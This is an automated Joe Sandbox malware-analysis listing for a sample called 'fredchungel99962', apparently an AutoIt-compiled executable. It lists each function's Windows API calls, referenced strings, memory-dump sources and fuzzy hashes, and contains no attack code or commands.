Uniqueness Score: -1.00%

Function 0131E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0131E6B4

Part of subcall function 012CE551: timeGetTime.WINMM ref: 012CE555

Sleep.KERNEL32(0000000A), ref: 0131E6E1
EnumThreadWindows.USER32 ref: 0131E705
FindWindowExW.USER32 ref: 0131E727
SetActiveWindow.USER32 ref: 0131E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0131E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0131E773
Sleep.KERNEL32(000000FA), ref: 0131E77E
IsWindow.USER32 ref: 0131E78A
EndDialog.USER32 ref: 0131E79B

Strings

BUTTON, xrefs: 0131E719

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: e5a72786f6d91c00bc81b89da484108c8bd397628fc642487d42d97a779be4f1
Instruction ID: c660bfca4f9c46f999fbb2db3f6d609ef6aa33dc4713ca6f5fa60ce5823be2db
Opcode Fuzzy Hash: e5a72786f6d91c00bc81b89da484108c8bd397628fc642487d42d97a779be4f1
Instruction Fuzzy Hash: F8218BB4201305AFFB265F24EC88A2A3BADF7557ACF046434E90182189DFA2AC00CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0131E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 012B9CB3: _wcslen.LIBCMT ref: 012B9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0131EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0131EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0131EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0131EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0131EAA7

Strings

close PlayMe, xrefs: 0131EA6E, 0131EA9B
play PlayMe, xrefs: 0131EAA2
alias PlayMe, xrefs: 0131EA36
open , xrefs: 0131EA0C
play PlayMe wait, xrefs: 0131EA91
status PlayMe mode, xrefs: 0131EA58

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 0663ec094e82b154323839ad858f4318f4a861f3291b53264e68695688f51793
Instruction ID: a6c9fd0fb0b0b0d9c2c7a8b910890abdd670c45de9e024aa3f45daa3af2db7f1
Opcode Fuzzy Hash: 0663ec094e82b154323839ad858f4318f4a861f3291b53264e68695688f51793
Instruction Fuzzy Hash: 1811A371A5025A7AF724E7A6DC9ADFF6E7CEBD2F48F400429F801A2194EE601944C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 012B2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32 ref: 012B2D07
RegisterClassExW.USER32(00000030), ref: 012B2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 012B2D42
InitCommonControlsEx.COMCTL32(?), ref: 012B2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 012B2D6F
LoadIconW.USER32 ref: 012B2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 012B2D94

Strings

+, xrefs: 012B2CF0
AutoIt v3 GUI, xrefs: 012B2D23
TaskbarCreated, xrefs: 012B2D37
0, xrefs: 012B2CE9

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 3fdde0e478c36b2a979dbc241f9022f2134c5b4c24c4dd524e339774a52a1470
Instruction ID: dca957212543bfca642d54cad38ea865210c8e69c6981c13bd2b7880e435e971
Opcode Fuzzy Hash: 3fdde0e478c36b2a979dbc241f9022f2134c5b4c24c4dd524e339774a52a1470
Instruction Fuzzy Hash: F821D6B9D12318AFDB20DFA4E849BDDBFB8FB08704F00511AF511A6288DBB15545CF91

Uniqueness

Uniqueness Score: -1.00%

Function 013450D4 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 01345186
ShowWindow.USER32(?,00000000), ref: 013451C7
ShowWindow.USER32(?,00000005), ref: 013451CD
SetFocus.USER32 ref: 013451D1

Part of subcall function 01346FBA: DeleteObject.GDI32(00000000), ref: 01346FE6

GetWindowLongW.USER32(?,000000F0), ref: 0134520D
SetWindowLongW.USER32 ref: 0134521A
InvalidateRect.USER32(?,00000000,00000001), ref: 0134524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 01345287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 01345296

Strings

8lr, xrefs: 01345104

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID: 8lr
API String ID: 3210457359-2725927297
Opcode ID: 3e5174583b53eed737d0fb8b9fbfcf22de87f2f6c8cebd88231eb1e1d08ff4e8
Instruction ID: 01a8a6e05c45028b2fe06a3d59406f7b96a41a92e475b2639c4498ffd94aa0d9
Opcode Fuzzy Hash: 3e5174583b53eed737d0fb8b9fbfcf22de87f2f6c8cebd88231eb1e1d08ff4e8
Instruction Fuzzy Hash: 06518C34E5220DBFEF349E28CC49BD97BE9EB05729F148116FA25962E0C775B980CB41

Uniqueness

Uniqueness Score: -1.00%

Function 013196E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,012FF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 01319717
LoadStringW.USER32(00000000,?,012FF7F8,00000001), ref: 01319720

Part of subcall function 012B9CB3: _wcslen.LIBCMT ref: 012B9CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,012FF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 01319742
LoadStringW.USER32(00000000,?,012FF7F8,00000001), ref: 01319745
MessageBoxW.USER32 ref: 01319866

Strings

Line %d (File "%s"):, xrefs: 0131978F
Error: , xrefs: 0131981D
%s (%d) : ==> %s: %s %s, xrefs: 0131984A
^ ERROR, xrefs: 013197FB
Line %d:, xrefs: 013197A0

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: a593f99f183342b5ec4d8229081ca8ff7b3fafd2fad9cfa989ff748347afb604
Instruction ID: 71f0273995062af30cc3f9af7712b4bf60727e9ade49f7573fb862b7365e319e
Opcode Fuzzy Hash: a593f99f183342b5ec4d8229081ca8ff7b3fafd2fad9cfa989ff748347afb604
Instruction Fuzzy Hash: A5414F7280020AABDF14EBE4CD95EFEB77DAF24788F500025E60572194EB356F88CB61

Uniqueness

Uniqueness Score: -1.00%

Function 013106DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 012B6B57: _wcslen.LIBCMT ref: 012B6B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 013107A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 013107BE
RegOpenKeyExW.ADVAPI32 ref: 013107DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 01310804
CLSIDFromString.OLE32(?,000001FE), ref: 0131082C
RegCloseKey.ADVAPI32(?), ref: 01310837
RegCloseKey.ADVAPI32(?), ref: 0131083C

Strings

\IPC$, xrefs: 01310784
\CLSID, xrefs: 01310724
SOFTWARE\Classes\, xrefs: 0131070E

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 549e5295f984bcde786933c4208f954f0b76cf0447b9e650390cd161c93a8e2a
Instruction ID: a4a2d42583c1d0bd0fd49611b03c62a61a931f5761766d6b333a412857464378
Opcode Fuzzy Hash: 549e5295f984bcde786933c4208f954f0b76cf0447b9e650390cd161c93a8e2a
Instruction Fuzzy Hash: 9641F876C11229ABDF29EFA4DC94CFEBB78BF14394F544129E905A7250EB30A944CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01333C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 01333C5C
CoInitialize.OLE32(00000000), ref: 01333C8A
CoUninitialize.OLE32 ref: 01333C94
_wcslen.LIBCMT ref: 01333D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 01333DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 01333ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 01333F0E
CoGetObject.OLE32(?,00000000,0134FB98,?), ref: 01333F2D
SetErrorMode.KERNEL32(00000000), ref: 01333F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01333FC4
VariantClear.OLEAUT32(?), ref: 01333FD8

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: af96caf07f069c5334f3826420767fa26bcb96aff75ede2cd312aca88fc337b3
Instruction ID: cab9ef245298428003a5657737e46388991f6f7c8683a7c9f371a32a6ba45d7c
Opcode Fuzzy Hash: af96caf07f069c5334f3826420767fa26bcb96aff75ede2cd312aca88fc337b3
Instruction Fuzzy Hash: 18C11271608205AFD710DF68C88496BBBE9FFC9748F04891DF98A9B250DB31ED45CB62

Uniqueness

Uniqueness Score: -1.00%

Function 01327A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 01327AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 01327B8F
SHGetDesktopFolder.SHELL32(?), ref: 01327BA3
CoCreateInstance.OLE32(0134FD08,00000000,00000001,01376E6C,?), ref: 01327BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 01327C74
CoTaskMemFree.OLE32(?), ref: 01327CCC
SHBrowseForFolderW.SHELL32(?), ref: 01327D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 01327D7A
CoTaskMemFree.OLE32(00000000), ref: 01327D81
CoTaskMemFree.OLE32(00000000), ref: 01327DD6
CoUninitialize.OLE32 ref: 01327DDC

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 5a9b1f546bce7f9b4b611ec26101c85d0359e3976f626f0b0f971ce8490a246b
Instruction ID: 69bb13538b253bffc938a289917a5bcf23dfb81f222bad2f694874982f996f83
Opcode Fuzzy Hash: 5a9b1f546bce7f9b4b611ec26101c85d0359e3976f626f0b0f971ce8490a246b
Instruction Fuzzy Hash: 8DC12D75A00119AFDB14DF64C884DAEBBF9FF58318B148499E91ADB361DB30ED41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0130FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0130FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0130FB08
VariantInit.OLEAUT32(?), ref: 0130FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0130FB3A
VariantCopy.OLEAUT32(?,?), ref: 0130FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0130FBA1
VariantClear.OLEAUT32(?), ref: 0130FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0130FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0130FBCC
VariantClear.OLEAUT32(?), ref: 0130FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0130FBE9

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 01dccb2a9f6bb6266830dace5d918d05de7472c396ace45e913caaa4b84ed12f
Instruction ID: 6966d13468db349937e2632c0c5d5fada43575ddd6a4a031809f91429cd311d2
Opcode Fuzzy Hash: 01dccb2a9f6bb6266830dace5d918d05de7472c396ace45e913caaa4b84ed12f
Instruction Fuzzy Hash: 4C415F35A00219DFCB25DFA8C8549EEBBBDFF58358F008069E915A7351CB30A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0133055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 013305BC
inet_addr.WSOCK32(?), ref: 0133061C
gethostbyname.WSOCK32(?), ref: 01330628
IcmpCreateFile.IPHLPAPI ref: 01330636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 013306C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 013306E5
IcmpCloseHandle.IPHLPAPI(?), ref: 013307B9
WSACleanup.WSOCK32 ref: 013307BF

Strings

Ping, xrefs: 01330676

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 9f8409474674737205a85d377c38ed6c9bc0e5db73805180a1dba6880883ce86
Instruction ID: 0d7733f4b934bd69b77574a8af371958abd28d5679c121d17be99fdb92dd5ac0
Opcode Fuzzy Hash: 9f8409474674737205a85d377c38ed6c9bc0e5db73805180a1dba6880883ce86
Instruction Fuzzy Hash: 24919F756082019FE725CF19C488F1ABBE4EF84358F1485A9F56A8B7A2CB30ED45CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01338CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 01338CF3

Part of subcall function 01318E54: _wcslen.LIBCMT ref: 01318E77

_wcslen.LIBCMT ref: 01338D4E
_wcslen.LIBCMT ref: 01338D9C
_wcslen.LIBCMT ref: 01338DDC
_wcslen.LIBCMT ref: 01338E6E

Strings

cdecl, xrefs: 01338D48, 01338D4D
stdcall, xrefs: 01338DD6, 01338DDB
none, xrefs: 01338E65, 01338E6A
winapi, xrefs: 01338D96, 01338D9B

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: c409f8bdc537320990a032f618f4cd4b7cb0e1f4db086e42aea415f9ffa8b8ea
Instruction ID: b2d840049d0a75b25507b3f01b508011de36ce14de72ad2b047c71257b3c6b54
Opcode Fuzzy Hash: c409f8bdc537320990a032f618f4cd4b7cb0e1f4db086e42aea415f9ffa8b8ea
Instruction Fuzzy Hash: A251B131A001179BCF25EF6CC8908BEB7A5BFA4628B204369F52AE7284D734D944C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0131C5D0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 012B7620: _wcslen.LIBCMT ref: 012B7625

GetMenuItemInfoW.USER32 ref: 0131C6EE
_wcslen.LIBCMT ref: 0131C735
SetMenuItemInfoW.USER32 ref: 0131C79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0131C7CA

Strings

x`r, xrefs: 0131C668
x`r, xrefs: 0131C661
`lr, xrefs: 0131C652
0, xrefs: 0131C6AF
`lr, xrefs: 0131C64B

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0$`lr$`lr$x`r$x`r
API String ID: 1227352736-3571036889
Opcode ID: a4d4bc3caa52258b083912e6557892e83975443c329f28c461dd5ab8f9fb0575
Instruction ID: 7f575a0d0ea783d0afa4078f542a1b7d1b8773ae029239dcec37ae5307a41bcd
Opcode Fuzzy Hash: a4d4bc3caa52258b083912e6557892e83975443c329f28c461dd5ab8f9fb0575
Instruction Fuzzy Hash: DF51F2716943019FE7199F2CC884B7B7BE8AF45728F042A2DFAA5D3194DBB0D804CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0133372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 01333774
CoUninitialize.OLE32 ref: 0133377F
CoCreateInstance.OLE32(?,00000000,00000017,0134FB78,?), ref: 013337D9
IIDFromString.OLE32(?,?), ref: 0133384C
VariantInit.OLEAUT32(?), ref: 013338E4
VariantClear.OLEAUT32(?), ref: 01333936

Strings

Invalid parameter, xrefs: 01333865
NULL Pointer assignment, xrefs: 0133381E
Failed to create object, xrefs: 013337E4, 0133389A

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 5bfe603b07c55c4b3e890398e3f01d620b7cb91c34b6f5377f6b771e8eb39dc1
Instruction ID: 451290c60a3f2027a83a504358da71a9ebf1ed6c3323b948ec48cce65fd1eb86
Opcode Fuzzy Hash: 5bfe603b07c55c4b3e890398e3f01d620b7cb91c34b6f5377f6b771e8eb39dc1
Instruction Fuzzy Hash: F161A075608301AFD311DF58C888B6ABBE8FF89758F00890DF9959B290D770E948CB96

Uniqueness

Uniqueness Score: -1.00%

Function 01328195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 01328257
SystemTimeToFileTime.KERNEL32(?,?), ref: 01328267
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 01328273
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 01328310
SetCurrentDirectoryW.KERNEL32(?), ref: 01328324
SetCurrentDirectoryW.KERNEL32(?), ref: 01328356
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0132838C
SetCurrentDirectoryW.KERNEL32(?), ref: 01328395

Strings

*.*, xrefs: 0132839B

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: a8a04f48e1ac21118fc4611f6709977d06b28c5e5b567d1a00c05c5a062aacc1
Instruction ID: 9c202d4d5a67ea95667cd67c8ae7e05994500859d65182c5e5c0b7ebcddd55b4
Opcode Fuzzy Hash: a8a04f48e1ac21118fc4611f6709977d06b28c5e5b567d1a00c05c5a062aacc1
Instruction Fuzzy Hash: AE61AC765143169FDB10EF64D8809AEB3ECFF99318F04496EE98983250EB31F945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01348B02 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 012C9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 012C9BB2

Part of subcall function 012C912D: GetCursorPos.USER32(?), ref: 012C9141
Part of subcall function 012C912D: ScreenToClient.USER32(00000000,?), ref: 012C915E
Part of subcall function 012C912D: GetAsyncKeyState.USER32 ref: 012C9183
